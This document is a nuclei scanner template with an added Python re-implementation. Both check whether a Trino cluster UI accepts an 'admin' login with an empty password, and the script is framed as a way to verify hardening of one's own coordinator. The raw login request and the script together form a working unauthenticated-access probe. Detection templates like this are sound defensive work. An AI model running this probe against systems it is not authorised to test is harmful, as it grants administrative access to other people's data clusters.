Vulnerability description
The /ui/login endpoint accepted a POST request with username=admin and an empty password, which resulted in a successful login. This indicated improper authentication validation or a default/admin account misconfiguration.
id: cluster-trino-admin-login

info:
  name: Cluster Overview Trino - Admin Login
  author: DhiyaneshDK
  severity: high
  description: |
    The /ui/login endpoint accepted a POST request with username=admin and an empty password, which resulted in a successful login. This indicated improper authentication validation or a default/admin account misconfiguration.
  metadata:
    verified: true
    max-request: 1
  tags: vuln,misconfig,dashboard,cluster,trino

variables:
  username: admin

http:
  - raw:
      - |
        POST /ui/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password=&redirectPath=

    matchers-condition: and
    matchers:
      - type: word
        part: set_cookie
        words:
          - "Trino-UI-Token"

      - type: status
        status:
          - 303
# digest: 4a0a00473045022100ffad0cde31b715a6391968c6aa5f021d0553139dac00288c1893c4bff888d517022044dc92f3f8e6286a807f797513a52ebada6bb4d1f60651340acc9fcd4e916364:922c64590222798bb761d5b6d8e72950
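The same check as plain Python, so the two matchers can be run against recorded responses and the request can be replayed against your own Trino coordinator when you harden it. This is an added example, not part of the nuclei template or the Trino project; it assumes the UI listens on port 8080 over plain HTTP unless told otherwise, and the hostname is whatever you pass on the command line.

```python
"""Re-implementation of the template above: POST username=admin with an empty
password to /ui/login and apply the same two matchers joined with AND
(HTTP 303 plus a Set-Cookie header carrying Trino-UI-Token). Added example."""
import http.client
from urllib.parse import urlencode

USERNAME = "admin"  # the template's `variables.username`


def is_empty_password_login(status: int, headers: list[tuple[str, str]]) -> bool:
    """Mirror `matchers-condition: and` from the template:
    - type: status -> the login handler answered 303 (redirect to redirectPath)
    - type: word   -> some Set-Cookie header contains "Trino-UI-Token"
    Both must hold: a 200 that re-renders the login form, or a 303 that sets no
    session cookie, is not reported as a finding."""
    set_cookies = [v for k, v in headers if k.lower() == "set-cookie"]
    cookie_hit = any("Trino-UI-Token" in v for v in set_cookies)
    return status == 303 and cookie_hit


def check_trino_ui(host: str, port: int = 8080, use_tls: bool = False,
                   timeout: float = 10.0) -> bool:
    """Send the template's request and return True when the empty password for
    `admin` is accepted. http.client never follows redirects, so the 303 and the
    cookie it sets are observed directly (assumed default port 8080)."""
    body = urlencode({"username": USERNAME, "password": "", "redirectPath": ""})
    conn_cls = http.client.HTTPSConnection if use_tls else http.client.HTTPConnection
    conn = conn_cls(host, port, timeout=timeout)
    try:
        conn.request("POST", "/ui/login", body=body,
                     headers={"Content-Type": "application/x-www-form-urlencoded"})
        resp = conn.getresponse()
        resp.read()  # drain the body so the connection closes cleanly
        return is_empty_password_login(resp.status, resp.getheaders())
    finally:
        conn.close()


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "localhost"
    if check_trino_ui(target):
        print("empty-password admin login accepted: authentication is not enforced")
    else:
        print("login rejected: no finding")
```

Run it against a coordinator before and after enabling password authentication to confirm the fix closes the finding.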